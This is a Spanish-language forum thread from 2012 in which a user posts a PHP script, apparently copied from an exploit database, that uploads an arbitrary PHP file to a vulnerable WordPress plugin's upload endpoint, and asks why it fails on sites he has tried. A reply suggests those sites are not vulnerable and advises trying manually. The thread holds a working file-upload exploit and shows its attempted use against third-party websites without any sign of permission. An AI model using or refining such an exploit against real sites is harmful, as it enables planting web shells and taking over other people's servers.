Exploit PHP para wordpress

Iniciado por TapIt, 11 Noviembre 2012, 15:13 PM

0 Miembros y 1 Visitante están viendo este tema.

TapIt

Muy buenas, estoy intentando utilizar este exploit en PHP.
http://www.exploit-db.com/exploits/18990/

Lo he hecho de la siguiente forma:

He creado un archivo de nombre "exploit.php" al que le añadido este código y lo he subido a un servidor web.
<?php

$uploadfile
="lo.php";
$ch 
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/html5avmanager/lib/uploadify/custom.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
         array(
'Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";

?>


Mi pregunta es:
Se supone que lo.php será el nombre del archivo que quiero subir al servidor. Para que el exploit lo encuentre lo he situado en la misma carpeta que está alojado el exploit.

¿Estoy haciendolo correctamente? He realizado varias pruebas en webs que deberían ser vulnerables pero no lo he conseguido.

Muchas gracias por adelantado. Saludos!!
Busca y encontrarás...

~ Yoya ~

Quizás la versiones del plugin de las web en la que haz probado no son vulnerables.

De cualquier forma, lo mejor que puedes hacer es intentarlo manualmente.

Saludos.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.